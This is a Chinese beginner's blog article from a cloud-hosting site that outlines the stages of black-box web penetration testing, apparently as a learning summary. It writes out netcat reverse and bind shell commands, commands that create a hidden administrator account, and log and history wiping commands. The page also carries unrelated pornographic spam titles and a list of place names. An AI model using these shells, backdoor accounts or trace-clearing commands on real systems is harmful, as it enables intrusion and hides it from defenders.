亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

怎么實現Web滲透的分析

發布時間:2021-12-27 15:16:01 來源:億速云 閱讀:138 作者:柒染 欄目:網絡安全

怎么實現Web滲透的分析,相信很多沒有經驗的人對此束手無策,為此本文總結了問題出現的原因和解決方法,通過這篇文章希望你能解決這個問題。

Web滲透測試分為白盒測試和黑盒測試,白盒測試是指目標網站的源碼等信息的情況下對其滲透,相當于代碼分析審計。而黑盒測試則是在對該網站系統信息不知情的情況下滲透,以下所說的Web滲透就是黑盒滲透。Web滲透分為以下幾個步驟,信息收集,漏洞掃描,漏洞利用,提權,內網滲透,留后門,清理痕跡。一般的滲透思路就是看是否有注入漏洞,然后注入得到后臺管理員賬號密碼,登錄后臺,上傳小馬,再通過小馬上傳大馬,提權,內網轉發,進行內網滲透,掃描內網c段存活主機及開放端口,看其主機有無可利用漏洞(nessus)端口(nmap)對應服務及可能存在的漏洞,對其利用(msf)拿下內網,留下后門,清理痕跡。或者看是否有上傳文件的地方,上傳一句話木馬,再用菜刀鏈接,拿到數據庫并可執行cmd命令,可繼續上大馬.........思路很多,很多時候成不成功可能就是一個思路的問題,技術可以不高,思路一定得騷。

怎么實現Web滲透的分析

信息收集信息收集是整個流程的重中之重,前期信息收集的越多,Web滲透的成功率就越高。DNS域名信息:通過url獲取其真實ip,子域名(Layer子域名爆破機),旁站(K8旁站,御劍1.5),c段,網站負責人及其信息(whois查詢)整站信息:服務器操作系統、服務器類型及版本(Apache/Nginx/Tomcat/IIS)、數據庫類型(Mysql/Oracle/Accees/Mqlserver)、腳本類型(php/jsp/asp/aspx)、CMS類型;網站常見搭配為:ASP和ASPX:ACCESS、SQLServerPHP:MySQL、PostgreSQLJSP:Oracle、MySQL敏感目錄信息(御劍,dirbust)開放端口信息(nmp)

怎么實現Web滲透的分析

漏洞掃描利用AWVS,AppScan,OWASP-ZAP,等可對網站進行網站漏洞的初步掃描,看其是否有可利用漏洞。常見漏洞:SQL注入XSS跨站腳本CSRF跨站請求偽造XXE(XML外部實體注入)漏洞SSRF(服務端請求偽造)漏洞文件包含漏洞文件上傳漏洞文件解析漏洞遠程代碼執行漏洞CORS跨域資源共享漏洞越權訪問漏洞目錄遍歷漏洞和任意文件讀取/下載漏洞

怎么實現Web滲透的分析

漏洞利用用工具也好什么也好對相應漏洞進行利用如:Sql注入(sqlmap)XSS(BEEF)后臺密碼爆破(burp)端口爆破(hydra)

怎么實現Web滲透的分析

提權獲得shell之后我們權限可能很低,因此要對自己提權,可以根據服務器版本對應的exp進行提權,對于Windows系統也可看其補丁對應漏洞的exp進行提權

怎么實現Web滲透的分析

內網滲透首先進行端口轉發可用ncnc使用方法:反向連接在公網主機上進行監聽:nc-lvp 4444在內網主機上執行:nc-e cmd.exe 公網主機ip4444成功之后即可得到一個內網主機shell正向連接遠程主機上執行:nc-l -p 4444 -t -e cmd.exe本地主機上執行:nc-vv 遠程主機ip4444成功后,本地主機即可遠程主機的一個shell然后就是對內網進行滲透了,可以用主機漏洞掃描工具(nessus,x-scan等)進行掃描看是否有可用漏洞,可用msf進行利用,或者用nmap掃描存活主機及開放端口,可用hydra進行端口爆破或者用msf對端口對應漏洞得到shell拿下內網留后門

怎么實現Web滲透的分析

留后門對于網站上傳一句話木馬,留下后門對于windows用戶可用hideadmin創建一個超級隱藏賬戶手工:netuser test$ 123456 /addnetlocalgroup administrators test$ /add這樣的話在cmd命令中看不到,但在控制面板可以看到,還需要改注冊表才能實現控制版面也看不到,太過麻煩,不多贅述,所以還是用工具省心省力。

怎么實現Web滲透的分析

痕跡清理日志清理:在win環境下的話用msf清理,命令如下:runclearlogsclearev如果在Liunx環境下:rm-f -r /var/log刪除/var/log下的文件exportHISTSIZE=0export HISTSIZE=0刪除bashshell保存的最后500條命令3389遠程登陸記錄清除:@echooff@regdelete "HKEY_CURRENT_USER\Software\Microsoft\TerminalServerClient\Default" /va /f@del"%USERPROFILE%\My Documents\Default.rdp" /a@exit另外在滲透時盡量用代理以免輕易的暴露自己ip。本人呢,也是個剛入安全圈的菜雞,以上是在學習中對滲透過程的一點總結,大牛勿噴,希望可以幫到那些剛剛入門的信息安全愛好者。

怎么實現Web滲透的分析

相關練習滲透綜合場景演練:利用自己學習到的知識對目標進行滲透測試,獲取目標系統的權限,從而獲取敏感信息,那么恭喜你,你已經完成了從安全小白到滲透測試工程師的蛻變。

看完上述內容,你們掌握怎么實現Web滲透的分析的方法了嗎?如果還想學到更多技能或想了解更多相關內容,歡迎關注億速云行業資訊頻道,感謝各位的閱讀!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

web
AI

满城县| 湘阴县| 绍兴市| 南江县| 疏勒县| 秦安县| 灵宝市| 河间市| 探索| 比如县| 淅川县| 库伦旗| 阿勒泰市| 文登市| 金秀| 武宁县| 志丹县| 濮阳市| 锦屏县| 大兴区| 英山县| 沙雅县| 丰镇市| 同江市| 宜都市| 弥勒县| 合江县| 桂东县| 福建省| 泰兴市| 邢台县| 卓尼县| 松滋市| 江西省| 沁水县| 龙陵县| 宝清县| 搜索| 鲁山县| 黄浦区| 泸州市|